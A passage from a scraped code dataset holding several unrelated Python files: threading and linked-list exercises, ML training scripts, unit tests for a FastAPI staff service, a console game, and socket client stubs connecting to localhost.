__name__ == '__main__':\n t1=Thread(target=foo)\n t2=Thread(target=bar)\n\n t1.setDaemon(True)\n\n t1.start()\n t2.start()\n\n print('main')","sub_path":"Day38/守护线程.py","file_name":"守护线程.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"354176652","text":"#!/usr/bin/env python \n\n# The 'solution' variable should hold the\n# solution when the script is done.\nsolution = 0\nN = 101\n\n# Your code goes here.\n# Should be < 10 lines.\n\na = [[0 for i in range(N)] \\\n for j in range(N)]\n\na[0][0] = 1\nfor x in range(N):\n for y in range(N):\n if x: a[x][y] += a[x-1][y]\n if y: a[x][y] += a[x][y-1]\n\nsolution = a[-1][-1]\n\n# Even better, but not expected:\n# from math import factorial as f\n# solution = f(2*(N-1))//f(N-1)**2\n\n# Check for the correct answer.\nif N == 101: \n print(\"#6 : Grid ::\", \"Correct.\" if solution == 90548514656103281165404177077484163874504589675413336841320 else (\"Wrong: \" + str(solution)))\n\n\n","sub_path":"02/q6.py","file_name":"q6.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"455197786","text":"from player import *\n\nimport next_frame\n\nfrom games import games\n\nplayers = [Player(*game) for game in games]\n\ndef colorize(pixels):\n f = np.vectorize(indexColor, otypes=3 * [np.uint8])\n return np.stack(f(pixels), axis=-1)\n\ndef writeVideo(path, video):\n from PIL import Image\n \n for i, image in enumerate(video):\n image = np.swapaxes(image, 0, 1)\n img = Image.fromarray(image, 'RGB')\n img.save(path + '%d.png' % i)\n\ndef run(iters=1000, steps=50):\n for i in range(iters):\n for _ in range(steps):\n player = random.choice(players)\n frames, actions, events = player.play(next_frame.sequence_length)\n next_frame.train(frames, actions)\n \n next_frame.save('next_frame/')\n \n player = random.choice(players)\n frames, actions, events = player.play(next_frame.sequence_length)\n predictions = next_frame.predict(frames, actions)\n frames = frames[-len(predictions):]\n\n # concat along y axis\n joined = np.concatenate([frames, predictions], 2)\n video = colorize(joined)\n \n path = 'predictions/%d/' % i\n import os\n if not os.path.exists(path):\n os.makedirs(path)\n writeVideo(path, video)\n\n","sub_path":"experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"554859037","text":"from bert_text.dataset import MSRA_NER\nfrom bert_text.prepare.classification import pipline\nimport tensorflow as tf\nfrom bert_text.layers import BertLayer\nfrom tensorflow.keras.layers import Bidirectional, LSTM\nfrom bert_text.layers import BertSquadLogitsLayer\n\ndef build_model(bert_path, max_seq_length, num_labels):\n in_id = tf.keras.layers.Input(shape=(max_seq_length,), name=\"input_ids\")\n in_mask = tf.keras.layers.Input(shape=(max_seq_length,), name=\"input_masks\")\n in_segment = tf.keras.layers.Input(shape=(max_seq_length,), name=\"segment_ids\")\n bert_inputs = [in_id, in_mask, in_segment]\n\n bert_output = BertLayer(bert_path=bert_path, n_fine_tune_layers=3, pooling=\"mean\")(bert_inputs)\n squad_logits_layer = BertSquadLogitsLayer(name='squad_logits')\n start_logits, end_logits = squad_logits_layer(bert_output)\n\n model = tf.keras.models.Model(inputs=bert_inputs, outputs=[in_id, start_logits, end_logits])\n model.compile(loss=CRF.loss, optimizer=\"adam\", metrics=CRF.viterbi_accuracy)\n model.summary()\n\n return model\n\n\nif __name__ == '__main__':\n dataset = MSRA_NER()\n bert_path = \"https://tfhub.dev/google/bert_chinese_L-12_H-768_A-12/1\"\n max_seq_length = 256\n\n train_inputs, train_labels, dev_inputs, dev_labels = pipline(bert_path=bert_path,\n dataset=dataset,\n max_seq_length=max_seq_length)\n\n model = build_model(bert_path, max_seq_length, num_labels=dataset.num_labels())\n\n model.fit(train_inputs, train_labels,\n validation_data=(dev_inputs, dev_labels),\n epochs=1, batch_size=10)\n","sub_path":"examples/Machine Reading Comprehension/cn_mrc.py","file_name":"cn_mrc.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"264408352","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\nimport time\nimport datetime\nimport json\nimport py_client\n\n'''\nrequest\n{\n \"src_type\":0,\n \"src_id\":0,\n \"dest_type\":0,\n \"dest_id\":0,\n \"msg_id\":0,\n \"version\":0,\n \"data\":{}\n}\n\nresponse\n{\n \"src_type\":0,\n \"src_id\":0,\n \"dest_type\":0,\n \"dest_id\":0,\n \"msg_id\":0,\n \"error_code\":0,\n \"data\":{}\n}\n'''\n\ndef RunTest():\n #print(help(py_client))\n if not py_client.Init():\n print(\"init fail\")\n return\n\n #连接\n conn_id=py_client.Connect(\"tcp:127.0.0.1:10010\",True)\n print(\"conn_id=%d\" % conn_id)\n\n #回显\n request = {\n \"src_type\":65001,\n \"src_id\":1,\n \"dest_type\":3,\n \"dest_id\":0,\n \"msg_id\":0,\n \"version\":0,\n \"data\":{\n \"message\":\"hello,world\"\n }\n }\n req_str=json.dumps(request)\n start=datetime.datetime.now()\n n=0\n while n < 10000:\n n+=1\n resp_str=py_client.Send(conn_id,req_str)\n resp_json=json.loads(resp_str)\n #print('resp:%s' % resp_json)\n if resp_json['function_return']:\n print('request fail,error_msg=%s, n=%d'\n % (resp_json['function_return'],n))\n break;\n if 0!=resp_json['error_code']:\n print('request fail,error_code=%d' %\n resp_json['error_code'])\n break\n\n end=datetime.datetime.now()\n print(\"time=%d\" % (end-start).seconds)\n\n py_client.Disconnect(conn_id)\n py_client.Stop()\n py_client.Wait()\n\n\nif \"__main__\"==__name__:\n RunTest()","sub_path":"c_plus_plus/lljz_disk/src/py_client/py_test_access_server.py","file_name":"py_test_access_server.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"28784314","text":"#!/usr/bin/env python\n# encoding: utf-8\n\nimport unittest\nimport baseelement\nimport datetime\nimport db\n\n\nclass TestBaseElement(unittest.TestCase):\n\n def setUp(self):\n self.elem = baseelement.BaseElement( \\\n name=\"Rigged Car\",\n author='eracoon',\n date = datetime.datetime(2014, 10, 14, 11, 56),\n artType='3D Art',\n tags='CAR, RIGGED, RIG, LOWPOLY, RACOON MEDIA, AWESOME'.lower(),\n downloadUrl='http://opengameart.org/sites/default/files/rigged_car.zip'\n )\n\n self.elem1 = baseelement.BaseElement( \\\n name=\"Rigged Car\",\n author='eracoon',\n date = datetime.datetime(2014, 10, 14, 11, 56),\n artType='3D Art',\n tags='CAR, RIGGED, RIG, LOWPOLY, RACOON MEDIA, AWESOME'.lower(),\n downloadUrl='http://opengameart.org/sites/default/files/rigged_car.zip'\n )\n\n self.elem2 = baseelement.BaseElement( \\\n author=\"ItsBobberson\",\n date=datetime.datetime(2014, 10, 14, 18, 7),\n artType=\"2D Art\",\n tags=[\"FONT\", \"BITMAP FONT\"],\n downloadUrl=\"http://opengameart.org/sites/default/files/BitmapHandwritingFont_v1_0.zip\",\n name=\"Bitmap Handwriting Font\"\n )\n\n def tearDown(self):\n pass\n\n def test_getattr(self):\n self.assertEqual(self.elem.name, \"Rigged Car\")\n self.assertEqual(self.elem.author, 'eracoon')\n self.assertEqual(self.elem.date, datetime.datetime(2014, 10, 14, 11, 56))\n self.assertEqual(self.elem.artType, '3D Art')\n self.assertEqual(self.elem.tags, 'CAR, RIGGED, RIG, LOWPOLY, RACOON MEDIA, AWESOME'.lower())\n self.assertEqual(self.elem.downloadUrl, 'http://opengameart.org/sites/default/files/rigged_car.zip')\n\n def test___eq__(self):\n self.assertEqual(self.elem, self.elem1)\n self.assertFalse(self.elem == self.elem2)\n\n def test___ne__(self):\n self.assertNotEqual(self.elem, self.elem2)\n self.assertFalse(self.elem != self.elem1)\n\n def test_Save(self):\n DB = db.Database(\n name='String',\n author='String',\n date='DateTime',\n artType='String',\n tags='String',\n downloadUrl='String',\n primary='downloadUrl'\n )\n self.elem.Save(DB)\n\n self.assertEqual(\n DB.Query(downloadUrl='http://opengameart.org/sites/default/files/rigged_car.zip'),\n [self.elem._attr])\n\n DB.Close()\n\nif __name__ == '__main__':\n unittest.main()\n\n","sub_path":"src/test_baseelement.py","file_name":"test_baseelement.py","file_ext":"py","file_size_in_byte":2713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"85610481","text":"from fastapi import FastAPI\nfrom bson.objectid import ObjectId\nfrom pymongo.mongo_client import MongoClient\nfrom starlette.testclient import TestClient\nfrom starlette.status import (\n HTTP_200_OK,\n HTTP_201_CREATED,\n HTTP_202_ACCEPTED,\n HTTP_204_NO_CONTENT,\n HTTP_404_NOT_FOUND,\n)\n\nfrom database.database import get_db\nfrom staff import crud\nfrom staff.schemas import StaffFullInfo\nfrom staff.schema_examples import staff_example\nfrom staff.enums import Gender as GenderEnum\nfrom main import app\n\nfrom urllib.parse import urlencode\nimport pymongo\nimport pydantic\nimport pytest\n\n\nclass TestRouter:\n\n @classmethod\n def setup_class(cls):\n cls.client = TestClient(app)\n\n def setup_method(self, method):\n self.staff_id = None\n self.staff_example = staff_example.copy()\n\n def teardown_method(self, method):\n if self.staff_id:\n self.client.delete(f\"/staff/delete/{self.staff_id}\", headers={})\n\n def test_1_create_staff(self):\n response = self.client.post(\"/staff/create\", headers={}, json=self.staff_example)\n assert response.status_code == HTTP_201_CREATED\n staff = response.json()\n assert isinstance(staff, dict)\n assert \"_id\" in staff\n self.staff_id = staff[\"_id\"]\n staff_model = StaffFullInfo(**staff)\n assert staff_model.staff_id == ObjectId(self.staff_id)\n with pytest.raises(pydantic.ValidationError):\n del staff[\"_id\"]\n staff_model = StaffFullInfo(**staff)#test ValidationError\n\n def test_2_update_staff(self):\n response = self.client.post(\"/staff/create\", headers={}, json=self.staff_example)\n assert response.status_code == HTTP_201_CREATED\n staff = response.json()\n self.staff_id = staff[\"_id\"]\n self.staff_example[\"name\"] = \"Poison Ivy\"\n self.staff_example[\"age\"] = 29\n self.staff_example[\"gender\"] = GenderEnum.female\n self.staff_example[\"profession\"] = \"IT Specialist\"\n self.staff_example[\"email\"] = \"posion.ivy@example.com\"\n response = self.client.put(f\"/staff/update/{self.staff_id}\", headers={}, json=self.staff_example)\n assert response.status_code == HTTP_202_ACCEPTED\n staff = response.json()\n assert staff[\"name\"] == self.staff_example[\"name\"]\n assert staff[\"age\"] == self.staff_example[\"age\"]\n assert staff[\"gender\"] == self.staff_example[\"gender\"]\n assert staff[\"profession\"] == self.staff_example[\"profession\"]\n assert staff[\"email\"] == self.staff_example[\"email\"]\n\n def test_3_get_staff(self):\n response = self.client.post(\"/staff/create\", headers={}, json=self.staff_example)\n assert response.status_code == HTTP_201_CREATED\n staff = response.json()\n self.staff_id = staff[\"_id\"]\n response = self.client.get(f\"/staff/get/{self.staff_id}\", headers={})\n assert response.status_code == HTTP_200_OK\n\n def test_4_staff_list(self):\n response = self.client.post(\"/staff/create\", headers={}, json=self.staff_example)\n assert response.status_code == HTTP_201_CREATED\n staff = response.json()\n self.staff_id = staff[\"_id\"]\n query = urlencode({\n \"gender\": staff[\"gender\"],\n \"age_lte\": (self.staff_example[\"age\"] + 10),\n \"age_gte\": staff[\"age\"],\n \"country\": staff[\"country\"],\n \"state\": staff[\"state\"],\n \"zipcode\": staff[\"zipcode\"],\n \"skills\": staff[\"skills\"],\n \"profession\": staff[\"profession\"],\n \"email\": staff[\"email\"],\n \"operator\": \"$and\",\n \"skip\": 0,\n \"limit\": 1,\n }, doseq=True)\n response = self.client.get(f\"/staff/list?{query}\", headers={})\n assert response.status_code == HTTP_200_OK\n staff_list = response.json()\n assert isinstance(staff_list, list)\n assert len(staff_list) > 0\n\n def test_5_delete_staff(self, monkeypatch):\n response = self.client.post(\"/staff/create\", headers={}, json=self.staff_example)\n assert response.status_code == HTTP_201_CREATED\n staff = response.json()\n response = self.client.delete(\"/staff/delete/{}\".format(staff[\"_id\"]), headers={})\n assert response.status_code == HTTP_204_NO_CONTENT\n response = self.client.get(\"/staff/get/{}\".format(staff[\"_id\"]), headers={})\n assert response.status_code == HTTP_404_NOT_FOUND\n","sub_path":"staffing/app/staff/tests/system/test_routers.py","file_name":"test_routers.py","file_ext":"py","file_size_in_byte":4448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"247997738","text":"from orator.seeds import Seeder\n\n\nclass BibliotecaTableSeeder(Seeder):\n\n def run(self):\n \"\"\"\n Run the database seeds.\n \"\"\"\n self.db.table('Biblioteca').insert({\n 'Nombre_Biblioteca': 'Biblioteca Nacional del Peru',\n 'Direccion': 'Av. De la Poesía 160, San Borja'\n })\n self.db.table('Biblioteca').insert({\n 'Nombre_Biblioteca': 'Gran Biblioteca Pública de Lima',\n 'Direccion': 'Av. Abancay 4ta. Cdra. s/n Lima 01'\n })\n","sub_path":"Semana8Hackaton/Bryan Arias/App/seeds/Biblioteca_table_seeder.py","file_name":"Biblioteca_table_seeder.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"232859463","text":"#!/usr/bin/env python3.7\r\n# -*- coding: utf-8 -*-\r\n#\r\n# LList.py\r\n# \r\n# Copyright 2019 phbrown \r\n# \r\n# This program is free software; you can redistribute it and/or modify\r\n# it under the terms of the GNU General Public License as published by\r\n# the Free Software Foundation; either version 2 of the License, or\r\n# (at your option) any later version.\r\n# \r\n# This program is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n# GNU General Public License for more details.\r\n# \r\n# You should have received a copy of the GNU General Public License\r\n# along with this program; if not, write to the Free Software\r\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,\r\n# MA 02110-1301, USA.\r\n# \r\n# \r\n\r\nfrom typing import Any, cast, List, Optional\r\n\r\nclass LList(object):\r\n \"\"\"Implements a linked list with a sentinel node indicating an empty\r\n list. The sentinel node has both data and next equal to None. No\r\n methods are provided to get or set the internal attributes of a\r\n list node directly, so as to discourage mucking about with the list\r\n without using the ADT methods.\"\"\"\r\n\r\n def _invariant(self) -> bool:\r\n \"\"\"Class invariant. This actually checks the entire list.\"\"\"\r\n valid = False\r\n if (self._next != None): # Normal node, check the next one\r\n # (We already know self._next != None, so the cast will work.)\r\n valid = cast(LList, self._next)._invariant()\r\n elif (self._next == None and self._data == None): # Sentinel\r\n valid = True\r\n return valid\r\n \r\n def __init__(self) -> None:\r\n \"\"\"Create an empty list node.\"\"\"\r\n self._data:Any = None\r\n self._next:Optional[LList] = None\r\n # Post\r\n assert self._invariant()\r\n \r\n # Query methods\r\n \r\n def isEmpty(self) -> bool:\r\n \"\"\"Returns True if the list is empty, False otherwise.\"\"\"\r\n # True if this is the sentinel node\r\n return self._data == None and self._next == None \r\n \r\n def size(self) -> int:\r\n \"\"\"Returns the number of items on the list.\"\"\"\r\n if self.isEmpty(): # No nodes, just return 0\r\n return 0\r\n else: # return 1 for this node, plus the size of the rest of the list\r\n # (We already know there *is* more list, so the cast will work.)\r\n return 1 + cast(LList, self._next).size()\r\n\r\n def search(self, value:Any) -> bool:\r\n \"\"\"Searches the list for value VALUE and returns a Boolean\r\n indicating that VALUE is present in the list (True) or not\r\n present in the list (False).\"\"\"\r\n if self.isEmpty(): # Empty list contains nothing\r\n return False\r\n elif self._data == value: \r\n # If this node has the right contents, return True\r\n return True\r\n else:\r\n # Otherwise, ask the rest of the list\r\n # (We already know there *is* more list, so the cast will work.)\r\n return cast(LList, self._next).search(value)\r\n\r\n def __str__(self) -> str:\r\n \"\"\"Returns a string representation of the list. This is very loosely\r\n based on the box diagram. Contents of a node are shown within\r\n ❬❭, with a ➞ to the next node. The empty list (sentinel node)\r\n is represented by ∅. So a list containing the strings \"Huey\",\r\n \"Dewey\", and \"Louie\", in that order, would be represented by\r\n the string \"❬Huey❭➞❬Dewey❭➞❬Louie❭➞∅\".\"\"\"\r\n if self.isEmpty(): # Show the sentinel node\r\n return \"\\u2205\" # \"∅\"\r\n else: # Show this node, and concatenate on the rest of the list\r\n # \r\n return \"\\u276c{}\\u276d\\u279e\".format(self._data) + \\\r\n str(cast(LList, self._next))\r\n \r\n def shallowCopy(self) -> 'LList':\r\n \"\"\"Returns a shallow copy of the list, only copying pointers.\"\"\"\r\n return self\r\n\r\n def deepCopy(self) -> 'LList':\r\n \"\"\"Returns a deep(er) copy of the list, copying data. Assumes all the\r\n data objects are immutable. (Unhappily, that's not easy to test.)\"\"\"\r\n newList:LList = LList() # if self is empty, this is the right value\r\n if not self.isEmpty():\r\n # Cast is safe because we already know self._next != None\r\n newList = cast(LList, self._next).deepCopy()\r\n newList.add(self._data)\r\n\r\n # Post:\r\n assert newList._invariant() and newList._data == self._data\r\n return newList\r\n\r\n\r\n # Mutator methods\r\n \r\n def add(self, value:Any) -> None:\r\n \"\"\"Adds a new node containing VALUE to the head of the list.\"\"\"\r\n newNode = LList() # Empty node\r\n \r\n # Copy the contents of the current head to the new node\r\n newNode._next = self._next\r\n newNode._data = self._data\r\n\r\n # Link to the new node (effectively, to the old head)\r\n self._next = newNode\r\n # Put the new data in the head node (now the new head)\r\n self._data = value\r\n # Post:\r\n assert self._invariant()\r\n \r\n def pop(self, pos:int = -1) -> Any:\r\n \"\"\"Pops the item at position POS off the list, \r\n and returns it.\"\"\"\r\n # Pre:\r\n assert (not (self.isEmpty())) # Can't pop from an empty list\r\n size = self.size() \r\n assert -size <= pos < size # Make sure POS argument is valid\r\n\r\n # Handle negative indexes in POS\r\n if pos < 0:\r\n pos = pos + size\r\n assert pos >= 0\r\n \r\n result = None # Make sure there *is* a result available to return\r\n if pos == 0: # Pop this node\r\n result = self._data # Data to return\r\n \r\n # (We know the list isn't empty, so there *is* a node there.)\r\n nextNode:LList = cast(LList, self._next)\r\n \r\n # Copy the next node's contents into this node.\r\n # The effect is to link around the next node.\r\n self._data = nextNode._data\r\n self._next = nextNode._next\r\n else: # pos > 0, so we count down pos until pos == 0\r\n # Popping position POS from here is the same as popping position\r\n # POS - 1 from the rest of the list\r\n # (We already know there *is* more list, so the cast will work.)\r\n result = cast(LList, self._next).pop(pos - 1)\r\n \r\n # Post:\r\n assert self._invariant()\r\n return result\r\n \r\n\r\ndef main(args:List[str]) -> int:\r\n return 0\r\n\r\nif __name__ == '__main__':\r\n import sys\r\n sys.exit(main(sys.argv))\r\n","sub_path":"LList.py","file_name":"LList.py","file_ext":"py","file_size_in_byte":6773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"55993056","text":"import random, time, msvcrt\r\nfrom enum import Enum\r\nWAIT_SECONDS = 1 / 5\r\nFIELD_WIDTH = 20\r\nFIELD_HEIGHT = 20\r\nBOAT_CHARACTER = \"》\"\r\nBLANK_CHARACTER = \" \"\r\nscore = 0\r\n\r\nclass INKB(Enum):\r\n UP = 1\r\n DOWN = 2\r\n LEFT = 3\r\n RIGHT = 4\r\n SHOT = 5\r\n NONE = 6\r\n\r\nclass Ship:\r\n\r\n def __init__(self, character, x, y):\r\n self.character = character\r\n self.x = x\r\n self.y = y\r\n \r\n def move(self, x, y):\r\n self.x += x\r\n self.y += y\r\n\r\n if self.x < 0:\r\n self.x = 0\r\n elif self.x >= FIELD_WIDTH:\r\n self.x = FIELD_WIDTH - 1\r\n \r\n if self.y < 0:\r\n self.y = 0\r\n elif self.y >= FIELD_HEIGHT:\r\n self.y = FIELD_HEIGHT - 1\r\n \r\n def setPosition(self, x, y):\r\n self.x = x\r\n self.y = y\r\n \r\n def overlap(self, x, y):\r\n return self.x == x and self.y == y\r\n\r\n\r\n\r\ndef initTile(width, height):\r\n tile = []\r\n for y in range(height):\r\n row = [False] * width\r\n tile.append(row)\r\n return tile\r\n\r\ndef initBoats(length):\r\n boats = []\r\n for i in range(length):\r\n boats.append(Ship(\"》\", 0, 0))\r\n return boats\r\n\r\ndef getINKB():\r\n if msvcrt.kbhit():\r\n key0 = str(msvcrt.getch())\r\n if key0 == \"b'\\\\xe0'\":\r\n key1 = str(msvcrt.getch())\r\n if key1 == \"b'H'\":\r\n return INKB.UP\r\n elif key1 == \"b'P'\":\r\n return INKB.DOWN\r\n elif key1 == \"b'K'\":\r\n return INKB.LEFT\r\n elif key1 == \"b'M'\":\r\n return INKB.RIGHT\r\n else:\r\n return INKB.NONE\r\n elif key0 == \"b'z'\":\r\n return INKB.SHOT\r\n else:\r\n return INKB.NONE\r\n else:\r\n return INKB.NONE\r\n\r\ndef tickMyShip(myShip, boats, tile, inkb):\r\n if inkb == INKB.UP:\r\n myShip.move(0, -1)\r\n elif inkb == INKB.DOWN:\r\n myShip.move(0, 1)\r\n elif inkb == INKB.LEFT:\r\n myShip.move(-1, 0)\r\n elif inkb == INKB.RIGHT:\r\n myShip.move(1, 0)\r\n elif inkb == INKB.SHOT and boats[0].x >= FIELD_WIDTH - 1:\r\n boats[0].setPosition(myShip.x, myShip.y)\r\n boats = boats[1:] + boats[:1]\r\n \r\n for boat in boats:\r\n if boat.x < FIELD_WIDTH - 2:\r\n if tile[boat.y][boat.x] == True:\r\n #score += 1\r\n tile[boat.y][boat.x] = False\r\n boat.move(FIELD_WIDTH, 0)\r\n elif tile[boat.y][boat.x - 1] == True:\r\n #score += 1\r\n tile[boat.y][boat.x - 1] = False\r\n boat.move(FIELD_WIDTH, 0)\r\n if boat.x <= FIELD_WIDTH:\r\n boat.move(1, 0)\r\n return boats, tile\r\n\r\ndef tickTile(tile):\r\n for y in range(FIELD_HEIGHT):\r\n row = tile[y]\r\n row = row[1:]\r\n row.append(random.randint(0, 4) == 0)\r\n tile[y] = row\r\n\r\ndef overlapBoats(boats, x, y):\r\n for boat in boats:\r\n if boat.x == x and boat.y == y:\r\n return True\r\n return False\r\n\r\ndef getTextTile(myShip, boats, tile):\r\n text = \"\"\r\n for y in range(FIELD_HEIGHT):\r\n for x in range(FIELD_WIDTH - 1):\r\n if myShip.overlap(x, y):\r\n text += myShip.character\r\n elif overlapBoats(boats, x, y):\r\n text += BOAT_CHARACTER\r\n elif tile[y][x] == True:\r\n text += \"■\"\r\n else:\r\n text += BLANK_CHARACTER\r\n text += \"\\n\"\r\n text += \"■\" * FIELD_WIDTH\r\n return text\r\n\r\ntick = 0\r\ntile = initTile(FIELD_WIDTH, FIELD_HEIGHT)\r\nmyShip = Ship(\">\", 0, 0)\r\nboats = initBoats(20)\r\nshowText = getTextTile(myShip, boats, tile)\r\nprint(showText)\r\nwhile True:\r\n inkb = getINKB()\r\n boats, tile = tickMyShip(myShip, boats, tile, inkb)\r\n if tick >= 1:\r\n tick -= 1\r\n tickTile(tile)\r\n text = getTextTile(myShip, boats, tile)\r\n if text != showText:\r\n showText = text\r\n print(showText)\r\n tick += WAIT_SECONDS\r\n time.sleep(WAIT_SECONDS)\r\n","sub_path":"shot.py","file_name":"shot.py","file_ext":"py","file_size_in_byte":4033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"106626849","text":"class Node:\r\n\r\n def __init__(self,data = None):\r\n self.data = data\r\n self.refNext = None\r\n\r\n\r\nclass Linked_list:\r\n def __init__(self):\r\n self.head = None\r\n\r\n\r\n def reverse(self):\r\n previous = None\r\n presentNode = self.head\r\n nextval = presentNode.refNext\r\n while nextval != None:\r\n presentNode.refNext = previous\r\n previous = presentNode\r\n presentNode = nextval\r\n nextval = nextval.refNext\r\n\r\n presentNode.refNext = previous\r\n self.head = presentNode\r\n\r\n def traverse(self):\r\n\r\n presentNode = self.head\r\n while presentNode:\r\n print(\"DATA VALUE = \",presentNode.data)\r\n presentNode = presentNode.refNext\r\n\r\n\r\n\r\n#EXECUTION \r\nobjNode1 = Node(1)\r\nobjNode2 = Node(2)\r\nobjNode3 = Node(3)\r\nobjNode4 = Node(4)\r\nlinkObj = Linked_list()\r\n#head of the linked list to first object\r\nlinkObj.head = objNode1\r\n# reference of the first node object to second object\r\nlinkObj.head.refNext = objNode2\r\nobjNode2.refNext = objNode3\r\nobjNode3.refNext = objNode4\r\nprint(\"traverse before reversing\")\r\nlinkObj.traverse()\r\nlinkObj.reverse()\r\nprint(\"traverse after reversing\")\r\nlinkObj.traverse()\r\n","sub_path":"Chapter 11/Reversing_a_linked_list4_2_7.py","file_name":"Reversing_a_linked_list4_2_7.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"615954770","text":"from bson import ObjectId\n\nfrom yadm import fields\nfrom yadm.documents import Document, EmbeddedDocument\n\nfrom .test_database import BaseDatabaseTest\n\n\nclass EmbeddedDocumentFieldTest(BaseDatabaseTest):\n def setUp(self):\n super().setUp()\n\n class ETestDoc(EmbeddedDocument):\n i = fields.IntegerField()\n\n class TestDoc(Document):\n __collection__ = 'testdoc'\n e = fields.EmbeddedDocumentField(ETestDoc)\n\n self.ETestDoc = ETestDoc\n self.TestDoc = TestDoc\n\n def test_default(self):\n td = self.TestDoc()\n self.assertFalse(hasattr(td, 'e'))\n\n def test_get(self):\n _id = self.db.db.testdoc.insert({'e': {'i': 13}})\n td = self.db.get_queryset(self.TestDoc).with_id(_id)\n\n self.assertTrue(hasattr(td, 'e'))\n self.assertIsInstance(td.e, self.ETestDoc)\n self.assertTrue(hasattr(td.e, 'i'))\n self.assertIsInstance(td.e.i, int)\n self.assertEqual(td.e.i, 13)\n\n def test_set(self):\n td = self.TestDoc()\n td.e = self.ETestDoc()\n\n self.assertTrue(hasattr(td, 'e'))\n self.assertIsInstance(td.e, self.ETestDoc)\n self.assertFalse(hasattr(td.e, 'i'))\n\n td.e.i = 13\n self.assertTrue(hasattr(td.e, 'i'))\n self.assertIsInstance(td.e.i, int)\n self.assertEqual(td.e.i, 13)\n\n def test_set_typeerror(self):\n class FailETestDoc(EmbeddedDocument):\n s = fields.StringField\n\n td = self.TestDoc()\n self.assertRaises(TypeError, setattr, td, 'e', FailETestDoc())\n\n def test_set_insert(self):\n td = self.TestDoc()\n td.e = self.ETestDoc()\n td.e.i = 13\n self.db.insert(td)\n\n data = self.db.db.testdoc.find_one({'_id': td.id})\n self.assertEqual(data, {'_id': td.id, 'e': {'i': 13}})\n\n def test_set_save(self):\n _id = self.db.db.testdoc.insert({'e': {'i': 13}})\n td = self.db.get_queryset(self.TestDoc).with_id(_id)\n\n td.e.i = 26\n # td.__fields_changed__.add('e.i')\n self.db.save(td)\n\n data = self.db.db.testdoc.find_one({'_id': _id})\n self.assertEqual(data, {'_id': _id, 'e': {'i': 26}})\n\n\nclass EmbeddedDocumentWithIdFieldTest(BaseDatabaseTest):\n def setUp(self):\n super().setUp()\n\n class ETestDoc(EmbeddedDocument):\n id = fields.ObjectIdField(default_gen=True)\n i = fields.IntegerField()\n\n class TestDoc(Document):\n __collection__ = 'testdoc'\n e = fields.EmbeddedDocumentField(ETestDoc)\n\n self.ETestDoc = ETestDoc\n self.TestDoc = TestDoc\n\n def test_load_default(self):\n td = self.TestDoc({'e': {'i': 13}})\n self.assertTrue(hasattr(td, 'e'))\n self.assertTrue(hasattr(td.e, 'i'))\n self.assertTrue(hasattr(td.e, 'id'))\n self.assertEqual(td.e.i, 13)\n self.assertIsInstance(td.e.id, ObjectId)\n","sub_path":"tests/test_fields_embedded.py","file_name":"test_fields_embedded.py","file_ext":"py","file_size_in_byte":2915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"534201626","text":"list = ['京急線','遅延','お客様トラブル','JR','運転見合わせ','雪','相鉄','運休','ストライキ決行']\nnum = int(len(list))\nprint ('要素数は', num)\n\n#欲しい情報は6個までとする\n\n# if 6 <= num:\n# del list [6 : num]\n\nnum = int (len(list))\nprint ('要素数は', num)\nprint ('##########################')\n\nlist2 = []\nlist3 = []\nlist4 = []\nx = int(0)\nwhile x < num:\n # print(list[x])\n list2.append(list[x])\n print(list2)\n x += 3\n\nx= int(1)\nwhile x < num:\n # print(list[x])\n list3.append(list[x])\n print(list3)\n x += 3\n\nx = int(2)\nwhile x < num:\n # print(list[x])\n list4.append(list[x])\n print(list4)\n x += 3\n\nprint('###########################')\n\nprint(list2)\nprint(list3)\nprint(list4)\n","sub_path":"program/python/train/sp/arrayTest.py","file_name":"arrayTest.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"160076239","text":"import socket\nimport sys\nimport select\n\n# from javax.swing import JFrame\nclass SocketClientTest:\n ServerIP = \"127.0.0.1\"\n ServerPort = 1103\n test = '123'\n addressFamily = (ServerIP, ServerPort)\n\n def __init__(self):\n self.messageString = ''\n self.clientName = \"\"\n self.serverMessage = \"\"\n self.channelName = \"\"\n self.messageInput = \"\"\n self.clientSock = socket.socket()\n self.command=\"\"\n\n \"\"\"\n def showTK(self):\n self.chatFrame = tk.Frame(self.top, bg='white')\n self.chatFrame.pack()\n self.chatTextBox = tk.Entry(self.top)\n self.chatTextBox.pack(side=\"top\")\n self.chatTArea = tk.Text(self.top)\n self.chatTArea.pack(side=\"bottom\")\n self.chatButton = tk.Button(self.top, text=\"Send\", command=self.sendToServer)\n self.chatButton.pack(side=\"right\")\n self.top.mainloop()\n \"\"\"\n\n def sendtoserver(self, soc,sock_list):\n print(\"Test\")\n # self.messageInput=\tself.chatTextBox.get()\n\n\n\n # self.fHandle.write(channelName.join(\":\".join(self.messageInput)))\n 